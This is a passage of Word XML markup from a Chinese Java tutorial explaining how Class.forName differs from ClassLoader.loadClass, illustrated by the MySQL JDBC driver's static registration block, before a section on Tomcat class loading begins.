          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是否被</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00600FF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区别就出来了。</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class.forName(className)</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>装载的</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>已经被初始化，而</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader.loadClass(className)</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>装载的</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>还没有被</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00600FF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一般情况下，这两个方法效果一样，都能装载</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。但如果程序依赖于</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是否被初始化，就必须用</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class.forName(name)</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00600FF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>例如，在</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>编程中，常看到这样的用法，</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class.forName("com.mysql.jdbc.Driver")</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，如果换成了</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> getClass().getClassLoader().loadClass("com.mysql.jdbc.Driver")</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，就不行。</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为什么呢？打开</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>com.mysql.jdbc.Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的源代码看看，</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// Register ourselves with the DriverManager</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>static {</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    try {</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        java.sql.DriverManager.registerDriver(new Driver());</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    } catch (SQLException E) {</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        throw new RuntimeException("Can't register driver!");</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原来，</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>块中会注册自己到</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java.sql.DriverManager</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。而</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>块就是在</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的初始化中被执行。所以这个地方就只能用</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class.forName(className)</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>另外一篇参考：</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://hi.baidu.com/ericwanghx/blog/item/3ed3482f2701b8f68a139998.html</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>块什么时候执行？：</w:t>
      </w:r>
      <w:r w:rsidRPr="007727A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://joes0619.blog.163.com/blog/static/104235032006922103733362/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26429" w:rsidRPr="00C26429" w:rsidRDefault="00C26429" w:rsidP="000C042B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00F27C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C76188" w:rsidRPr="00C26429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00C76188" w:rsidRPr="00C26429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类加载机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41887" w:rsidRPr="00F92975" w:rsidRDefault="00F41887" w:rsidP="00C10394">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
